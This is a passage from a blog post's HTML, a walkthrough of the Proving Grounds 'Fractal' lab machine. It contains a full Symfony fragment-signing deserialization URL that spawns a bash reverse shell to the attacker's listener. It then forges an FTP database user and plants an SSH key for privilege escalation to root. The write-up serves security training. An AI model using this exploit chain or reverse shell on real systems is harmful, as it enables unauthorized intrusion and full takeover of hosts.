                    href="http://192.168.192.233/_fragment?_path=_controller%3DSymfony%255CComponent%255CYaml%255CInline%253A%253Aparse%26value%3D%2521php%252Fobject%2BO%253A32%253A%2522Monolog%255CHandler%255CSyslogUdpHandler%2522%253A1%253A%257Bs%253A9%253A%2522%2500%252A%2500socket%2522%253BO%253A29%253A%2522Monolog%255CHandler%255CBufferHandler%2522%253A7%253A%257Bs%253A10%253A%2522%2500%252A%2500handler%2522%253BO%253A29%253A%2522Monolog%255CHandler%255CBufferHandler%2522%253A7%253A%257Bs%253A10%253A%2522%2500%252A%2500handler%2522%253BN%253Bs%253A13%253A%2522%2500%252A%2500bufferSize%2522%253Bi%253A-1%253Bs%253A9%253A%2522%2500%252A%2500buffer%2522%253Ba%253A1%253A%257Bi%253A0%253Ba%253A2%253A%257Bi%253A0%253Bs%253A2%253A%2522-1%2522%253Bs%253A5%253A%2522level%2522%253BN%253B%257D%257Ds%253A8%253A%2522%2500%252A%2500level%2522%253BN%253Bs%253A14%253A%2522%2500%252A%2500initialized%2522%253Bb%253A1%253Bs%253A14%253A%2522%2500%252A%2500bufferLimit%2522%253Bi%253A-1%253Bs%253A13%253A%2522%2500%252A%2500processors%2522%253Ba%253A2%253A%257Bi%253A0%253Bs%253A7%253A%2522current%2522%253Bi%253A1%253Bs%253A6%253A%2522system%2522%253B%257D%257Ds%253A13%253A%2522%2500%252A%2500bufferSize%2522%253Bi%253A-1%253Bs%253A9%253A%2522%2500%252A%2500buffer%2522%253Ba%253A1%253A%257Bi%253A0%253Ba%253A2%253A%257Bi%253A0%253Bs%253A52%253A%2522bash%2B-c%2B%2527bash%2B-i%2B%253E%2526%2B%252Fdev%252Ftcp%252F192.168.45.227%252F80%2B0%253E%25261%2527%2522%253Bs%253A5%253A%2522level%2522%253BN%253B%257D%257Ds%253A8%253A%2522%2500%252A%2500level%2522%253BN%253Bs%253A14%253A%2522%2500%252A%2500initialized%2522%253Bb%253A1%253Bs%253A14%253A%2522%2500%252A%2500bufferLimit%2522%253Bi%253A-1%253Bs%253A13%253A%2522%2500%252A%2500processors%2522%253Ba%253A2%253A%257Bi%253A0%253Bs%253A7%253A%2522current%2522%253Bi%253A1%253Bs%253A6%253A%2522system%2522%253B%257D%257D%257D%26exceptionOnInvalidType%3D0%26objectSupport%3D1%26objectForMap%3D0%26references%3D%26flags%3D516&amp;_hash=PC7%2FGws9sawDouQ0AzUn3VpCDiEZhuUcPt01QQOMvx4%3D">http://192.168.192.233/_fragment?_path=_controller%3DSymfony%255CComponent%255CYaml%255CInline%253A%253Aparse%26value%3D%2521php%252Fobject%2BO%253A32%253A%2522Monolog%255CHandler%255CSyslogUdpHandler%2522%253A1%253A%257Bs%253A9%253A%2522%2500%252A%2500socket%2522%253BO%253A29%253A%2522Monolog%255CHandler%255CBufferHandler%2522%253A7%253A%257Bs%253A10%253A%2522%2500%252A%2500handler%2522%253BO%253A29%253A%2522Monolog%255CHandler%255CBufferHandler%2522%253A7%253A%257Bs%253A10%253A%2522%2500%252A%2500handler%2522%253BN%253Bs%253A13%253A%2522%2500%252A%2500bufferSize%2522%253Bi%253A-1%253Bs%253A9%253A%2522%2500%252A%2500buffer%2522%253Ba%253A1%253A%257Bi%253A0%253Ba%253A2%253A%257Bi%253A0%253Bs%253A2%253A%2522-1%2522%253Bs%253A5%253A%2522level%2522%253BN%253B%257D%257Ds%253A8%253A%2522%2500%252A%2500level%2522%253BN%253Bs%253A14%253A%2522%2500%252A%2500initialized%2522%253Bb%253A1%253Bs%253A14%253A%2522%2500%252A%2500bufferLimit%2522%253Bi%253A-1%253Bs%253A13%253A%2522%2500%252A%2500processors%2522%253Ba%253A2%253A%257Bi%253A0%253Bs%253A7%253A%2522current%2522%253Bi%253A1%253Bs%253A6%253A%2522system%2522%253B%257D%257Ds%253A13%253A%2522%2500%252A%2500bufferSize%2522%253Bi%253A-1%253Bs%253A9%253A%2522%2500%252A%2500buffer%2522%253Ba%253A1%253A%257Bi%253A0%253Ba%253A2%253A%257Bi%253A0%253Bs%253A52%253A%2522bash%2B-c%2B%2527bash%2B-i%2B%253E%2526%2B%252Fdev%252Ftcp%252F192.168.45.227%252F80%2B0%253E%25261%2527%2522%253Bs%253A5%253A%2522level%2522%253BN%253B%257D%257Ds%253A8%253A%2522%2500%252A%2500level%2522%253BN%253Bs%253A14%253A%2522%2500%252A%2500initialized%2522%253Bb%253A1%253Bs%253A14%253A%2522%2500%252A%2500bufferLimit%2522%253Bi%253A-1%253Bs%253A13%253A%2522%2500%252A%2500processors%2522%253Ba%253A2%253A%257Bi%253A0%253Bs%253A7%253A%2522current%2522%253Bi%253A1%253Bs%253A6%253A%2522system%2522%253B%257D%257D%257D%26exceptionOnInvalidType%3D0%26objectSupport%3D1%26objectForMap%3D0%26references%3D%26flags%3D516&amp;_hash=PC7%2FGws9sawDouQ0AzUn3VpCDiEZhuUcPt01QQOMvx4%3D</a>
                </li>
                <li>
                  <p><code class="language-plaintext highlighter-rouge">rlwrap nc -lvnp 80</code></p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%2018.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%2018.png" alt="Untitled" loading="lazy"></a></p>
                </li>
                <li>
                  <p><code class="language-plaintext highlighter-rouge">local.txt</code></p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%2019.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%2019.png" alt="Untitled" loading="lazy"></a></p>
                </li>
              </ul>

              <h2 id="priv-escalation"><span class="me-2">Priv Escalation</span><a href="#priv-escalation"
                  class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

              <ul>
                <li>
                  <p><code class="language-plaintext highlighter-rouge">cat /etc/passwd</code> → there is the user
                    benoit</p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%2020.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%2020.png" alt="Untitled" loading="lazy"></a></p>
                </li>
              </ul>

              <p>I previously obtained access to database information, let’s check and access it.</p>

              <ul>
                <li>
                  <p><code class="language-plaintext highlighter-rouge">netstat -nlpt</code></p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%2021.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%2021.png" alt="Untitled" loading="lazy"></a></p>
                </li>
              </ul>

              <p>I tried to access MySQL with the credentials obtained earlier but failed. Then I looked for cron,
                kernel version, SSH, etc., but found nothing. So I decided to look at the FTP configuration files.</p>

              <ul>
                <li>
                  <p><code class="language-plaintext highlighter-rouge">ls -lah /etc/proftpd</code></p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%2022.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%2022.png" alt="Untitled" loading="lazy"></a></p>
                </li>
                <li>
                  <p><code class="language-plaintext highlighter-rouge">cat sql.conf</code></p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%2023.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%2023.png" alt="Untitled" loading="lazy"></a></p>
                </li>
              </ul>

              <p>Let’s connect to SQL.</p>

              <ul>
                <li>
                  <p><code class="language-plaintext highlighter-rouge">mysql -u proftpd -p proftpd</code> : <code
                      class="language-plaintext highlighter-rouge">protfpd_with_MYSQL_password</code> →</p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%2024.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%2024.png" alt="Untitled" loading="lazy"></a></p>
                </li>
              </ul>

              <p>It seems to have a password for www to access proftpd. FTP authentication through ProFTPD</p>

              <p>I will create a new password for the user <strong>benoit</strong> who already exists in the system.</p>

              <p>In the <code class="language-plaintext highlighter-rouge">{md5}</code> base64-encoded format.
                Therefore, the right way to generate a password for the user <strong>benoit</strong> is to use the
                base64-encoded MD5 hash method.</p>

              <ul>
                <li><code
                    class="language-plaintext highlighter-rouge">/bin/echo "{md5}"/bin/echo -n "hendrich" | openssl dgst -binary -md5 | openssl enc -base64</code>
                </li>
                <li>
                  <p><code
                      class="language-plaintext highlighter-rouge">INSERT INTO `ftpuser` (`id`, `userid`, `passwd`, `uid`, `gid`, `homedir`, `shell`, `count`, `accessed`, `modified`) VALUES (NULL, 'benoit', '{md5}wZjbZseC3NVjPeEobwukRg==', 1000, 1000, '/', '/bin/bash', 0, NOW(), NOW());</code>
                  </p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%2025.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%2025.png" alt="Untitled" loading="lazy"></a></p>
                </li>
              </ul>

              <p>Now logging into FTP</p>

              <ul>
                <li>
                  <p><code class="language-plaintext highlighter-rouge">ftp 192.168.192.233</code> <code
                      class="language-plaintext highlighter-rouge">benoit:hendrich</code></p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%2026.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%2026.png" alt="Untitled" loading="lazy"></a></p>
                </li>
                <li>
                  <p><code class="language-plaintext highlighter-rouge">ssh-keygen</code></p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%2027.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%2027.png" alt="Untitled" loading="lazy"></a></p>
                </li>
                <li><code class="language-plaintext highlighter-rouge">cp id_rsa.pub authorized_keys</code></li>
                <li><code class="language-plaintext highlighter-rouge">mkdir .ssh</code></li>
                <li>
                  <p><code class="language-plaintext highlighter-rouge">put authorized_keys</code></p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%2028.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%2028.png" alt="Untitled" loading="lazy"></a></p>
                </li>
                <li>
                  <p><code class="language-plaintext highlighter-rouge">ssh -i id_rsa benoit@192.168.192.233</code></p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%2029.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%2029.png" alt="Untitled" loading="lazy"></a></p>
                </li>
                <li>
                  <p><code class="language-plaintext highlighter-rouge">sudo -l</code> → has permission to execute
                    everything. sudo su works</p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%2030.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%2030.png" alt="Untitled" loading="lazy"></a></p>
                </li>
                <li>
                  <p><code class="language-plaintext highlighter-rouge">flag</code></p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%2031.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%2031.png" alt="Untitled" loading="lazy"></a></p>
                </li>
              </ul>

            </div>

            <div class="post-tail-wrapper text-muted">
              <!-- categories -->

              <div class="post-meta mb-3">
                <i class="far fa-folder-open fa-fw me-1"></i>

                <a href="/categories/proving-grounds/">Proving Grounds</a>,
                <a href="/categories/easy/">Easy</a>
              </div>


              <!-- tags -->

              <div class="post-tags">
                <i class="fa fa-tags fa-fw me-1"></i>

                <a href="/tags/linux/" class="post-tag no-text-decoration">Linux</a>

                <a href="/tags/web/" class="post-tag no-text-decoration">Web</a>

                <a href="/tags/symfony/" class="post-tag no-text-decoration">Symfony</a>

                <a href="/tags/mysql/" class="post-tag no-text-decoration">MySQL</a>

                <a href="/tags/oscp/" class="post-tag no-text-decoration">OSCP</a>

              </div>


              <div class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      ">
                <div class="license-wrapper">



                  This post is licensed under
                  <a href="https://creativecommons.org/licenses/by/4.0/">
                    CC BY 4.0
                  </a>
                  by the author.

                </div>

                <!-- Post sharing snippet -->

                <div class="share-wrapper d-flex align-items-center">
                  <span class="share-label text-muted">Share</span>
                  <span class="share-icons">








                    <a href="https://twitter.com/intent/tweet?text=Proving%20Grounds%20-%20Fractal%20-%20&url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2FProving-Grounds-Fractal%2F"
                      target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter"
                      aria-label="Twitter">
                      <i class="fa-fw fa-brands fa-square-x-twitter"></i>
                    </a>




                    <a href="https://www.facebook.com/sharer/sharer.php?title=Proving%20Grounds%20-%20Fractal%20-%20&u=http%3A%2F%2Flocalhost%3A4000%2Fposts%2FProving-Grounds-Fractal%2F"
                      target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook"
                      aria-label="Facebook">
                      <i class="fa-fw fab fa-facebook-square"></i>
                    </a>




                    <a href="https://t.me/share/url?url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2FProving-Grounds-Fractal%2F&text=Proving%20Grounds%20-%20Fractal%20-%20"
                      target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram"
                      aria-label="Telegram">
                      <i class="fa-fw fab fa-telegram"></i>
                    </a>


                    <button id="copy-link" aria-label="Copy link" class="btn small" data-bs-toggle="tooltip"
                      data-bs-placement="top" title="Copy link" data-title-succeed="Link copied successfully!">
                      <i class="fa-fw fas fa-link pe-none fs-6"></i>
                    </button>
                  </span>
                </div>

              </div>
              <!-- .post-tail-bottom -->
            </div>
            <!-- div.post-tail-wrapper -->
          </article>


        </main>

        <!-- panel -->
        <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 mb-5 text-muted">
          <div class="access">
            <!-- Get 5 last posted/updated posts -->














            <section id="access-lastmod">
              <h2 class="panel-heading">Recently Updated</h2>
              <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">




                <li class="text-truncate lh-lg">
                  <a href="/posts/Proving-Grounds-ClamAV/">Proving Grounds - ClamAV</a>
                </li>




                <li class="text-truncate lh-lg">
                  <a href="/posts/Proving-Grounds-Exfiltrated/">Proving Grounds - Exfiltrated</a>
                </li>




                <li class="text-truncate lh-lg">
                  <a href="/posts/Proving-Grounds-Twiggy/">Proving Grounds - Twiggy</a>
                </li>




                <li class="text-truncate lh-lg">
                  <a href="/posts/Proving-Grounds-Squid/">Proving Grounds - Squid</a>
                </li>




                <li class="text-truncate lh-lg">
                  <a href="/posts/Proving-Grounds-Fractal/">Proving Grounds - Fractal</a>
                </li>

              </ul>
            </section>
            <!-- #access-lastmod -->


            <!-- The trending tags list -->





























































































































































































































































































































































































            <section>
              <h2 class="panel-heading">Trending Tags</h2>
              <div class="d-flex flex-wrap mt-3 mb-1 me-3">


                <a class="post-tag btn btn-outline-primary" href="/tags/oscp/">OSCP</a>


                <a class="post-tag btn btn-outline-primary" href="/tags/linux/">Linux</a>


                <a class="post-tag btn btn-outline-primary" href="/tags/web/">Web</a>


                <a class="post-tag btn btn-outline-primary" href="/tags/clamav-milter/">ClamAV-Milter</a>


                <a class="post-tag btn btn-outline-primary" href="/tags/exiftool/">Exiftool</a>


                <a class="post-tag btn btn-outline-primary" href="/tags/mysql/">MySQL</a>


                <a class="post-tag btn btn-outline-primary" href="/tags/saltstack/">SaltStack</a>


                <a class="post-tag btn btn-outline-primary" href="/tags/snmp/">SNMP</a>


                <a class="post-tag btn btn-outline-primary" href="/tags/squid/">Squid</a>


                <a class="post-tag btn btn-outline-primary" href="/tags/subrion/">Subrion</a>

              </div>
            </section>


          </div>







          <section id="toc-wrapper" class="d-none ps-0 pe-4">
            <h2 class="panel-heading ps-3 mb-2">Contents</h2>
            <nav id="toc"></nav>
          </section>



        </aside>
      </div>

      <div class="row">
        <!-- tail -->
        <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">


          <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

          <!-- The total size of related posts -->


          <!-- An random integer that bigger than 0 -->


          <!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->













































































          <aside id="related-posts" aria-labelledby="related-label">
            <h3 class="mb-4" id="related-label">Further Reading</h3>
            <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">

              <article class="col">
                <a href="/posts/Proving-Grounds-Exfiltrated/" class="post-preview card h-100">
                  <div class="card-body">
                    <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




                    <time data-ts="1720839600" data-df="ll">
                      Jul 13, 2024
                    </time>

                    <h4 class="pt-0 my-2">Proving Grounds - Exfiltrated</h4>
                    <div class="text-muted">
                      <p>Exfiltrated was a well-structured box that provided an excellent opportunity to exploit a
                        Subrion CMS vulnerability and perform privilege escalation via an Exiftool exploit.

                        Initial enumeration le...</p>
                    </div>
                  </div>
                </a>
              </article>

              <article class="col">
                <a href="/posts/Proving-Grounds-Twiggy/" class="post-preview card h-100">
                  <div class="card-body">
                    <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




                    <time data-ts="1720753200" data-df="ll">
                      Jul 12, 2024
                    </time>

                    <h4 class="pt-0 my-2">Proving Grounds - Twiggy</h4>
                    <div class="text-muted">
                      <p>Twiggy was an insightful machine focused on exploiting a SaltStack vulnerability.

                        The machine required initial enumeration to identify open services, followed by a specific focus
                        on the web servic...</p>
                    </div>
                  </div>
                </a>
              </article>

              <article class="col">
                <a href="/posts/Proving-Grounds-ClamAV/" class="post-preview card h-100">
                  <div class="card-body">
                    <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




                    <time data-ts="1720926000" data-df="ll">
                      Jul 14, 2024
                    </time>

                    <h4 class="pt-0 my-2">Proving Grounds - ClamAV</h4>
                    <div class="text-muted">
                      <p>ClamAV was an insightful box to explore exploitation techniques for services like
                        ClamAV-Milter.

                        The process started with comprehensive information gathering, including a full port scan
                        revealing ...</p>
                    </div>
                  </div>
                </a>
              </article>

            </nav>
          </aside>
          <!-- #related-posts -->




          <!-- Navigation buttons at the bottom of the post. -->

          <nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">




            <div class="btn btn-outline-primary disabled" aria-label="Older">
              <p>-</p>
            </div>



            <a href="/posts/Proving-Grounds-Squid/" class="btn btn-outline-primary" aria-label="Newer">
              <p>Proving Grounds - Squid</p>
            </a>

          </nav>



          <!-- The comments switcher -->




          <!-- The Footer -->

          <footer aria-label="Site Info"
            class="d-flex flex-column justify-content-center text-muted flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3">
            <p>
              © <time>2024</time>


              <a href="https://github.com/arthurhendrich">H3NDR1CH</a>.
              <span data-bs-toggle="tooltip" data-bs-placement="top"
                title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some
                rights reserved.</span>

            </p>
          </footer>

        </div>
      </div>

      <!-- The Search results -->

      <div id="search-result-wrapper" class="d-flex justify-content-center d-none">
        <div class="col-11 content">
          <div id="search-hints">
            <!-- The trending tags list -->





























































































































































































































































































































































































            <section>
              <h2 class="panel-heading">Trending Tags</h2>
              <div class="d-flex flex-wrap mt-3 mb-1 me-3">


                <a class="post-tag btn btn-outline-primary" href="/tags/oscp/">OSCP</a>


                <a class="post-tag btn btn-outline-primary" href="/tags/linux/">Linux</a>


                <a class="post-tag btn btn-outline-primary" href="/tags/web/">Web</a>


                <a class="post-tag btn btn-outline-primary" href="/tags/clamav-milter/">ClamAV-Milter</a>


                <a class="post-tag btn btn-outline-primary" href="/tags/exiftool/">Exiftool</a>


                <a class="post-tag btn btn-outline-primary" href="/tags/mysql/">MySQL</a>


                <a class="post-tag btn btn-outline-primary" href="/tags/saltstack/">SaltStack</a>


                <a class="post-tag btn btn-outline-primary" href="/tags/snmp/">SNMP</a>


                <a class="post-tag btn btn-outline-primary" href="/tags/squid/">Squid</a>


                <a class="post-tag btn btn-outline-primary" href="/tags/subrion/">Subrion</a>

              </div>
            </section>


          </div>
          <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
        </div>
      </div>

    </div>

    <aside aria-label="Scroll to Top">
      <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
        <i class="fas fa-angle-up"></i>
      </button>
    </aside>
  </div>

  <div id="mask"></div>


  <aside id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true" data-bs-animation="true"
    data-bs-autohide="false">
    <div class="toast-header">
      <button type="button" class="btn-close ms-auto" data-bs-dismiss="toast" aria-label="Close"></button>
    </div>
    <div class="toast-body text-center pt-0">
      <p class="px-2 mb-3">A new version of content is available.</p>
      <button type="button" class="btn btn-primary" aria-label="Update">
        Update
      </button>
    </div>
  </aside>



  <!-- JavaScripts -->
  <!-- JS selector for site. -->

  <!-- commons -->



  <!-- layout specified -->





  <!-- image lazy-loading & popup & clipboard -->

























































































  <script
    src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.11/dayjs.min.js,npm/dayjs@1.11.11/locale/en.min.js,npm/dayjs@1.11.11/plugin/relativeTime.min.js,npm/dayjs@1.11.11/plugin/localizedFormat.min.js,npm/tocbot@4.27.20/dist/tocbot.min.js,npm/mermaid@10.9.0/dist/mermaid.min.js"></script>







  <script src="/assets/js/dist/post.min.js"></script>



  <!-- Pageviews -->







  <!-- mermaid-js loader -->
  <script type="text/javascript">
    function updateMermaid(event) {
      if (event.source === window && event.data && event.data.direction === ModeToggle.ID) {
        const mode = event.data.message;

        if (typeof mermaid === 'undefined') {
          return;
        }

        let expectedTheme = mode === ModeToggle.DARK_MODE ? 'dark' : 'default';
        let config = { theme: expectedTheme }; const mermaidList = document.getElementsByClassName('mermaid');

        [...mermaidList].forEach((elem) => {
          const svgCode = elem.previousSibling.children.item(0).innerHTML;
          elem.innerHTML = svgCode;
          elem.removeAttribute('data-processed');
        });

        mermaid.initialize(config);
        mermaid.init(undefined, '.mermaid');
      }
    }

    (function () {
      let initTheme = 'default';
      const html = document.documentElement;

      if (
        (html.hasAttribute('data-mode') && html.getAttribute('data-mode') === 'dark') ||
        (!html.hasAttribute('data-mode') && window.matchMedia('(prefers-color-scheme: dark)').matches)
      ) {
        initTheme = 'dark';
      }

      let mermaidConf = {
        theme: initTheme
      }; const basicList = document.getElementsByClassName('language-mermaid');
      [...basicList].forEach((elem) => {
        const svgCode = elem.textContent;
        const backup = elem.parentElement;
        backup.classList.add('d-none'); let mermaid = document.createElement('pre');
        mermaid.classList.add('mermaid');
        const text = document.createTextNode(svgCode);
        mermaid.appendChild(text);
        backup.after(mermaid);
      });

      mermaid.initialize(mermaidConf);
      window.addEventListener('message', updateMermaid);
    })();
  </script>






  <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





  <script>SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function (prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  </script>

</body>

</html>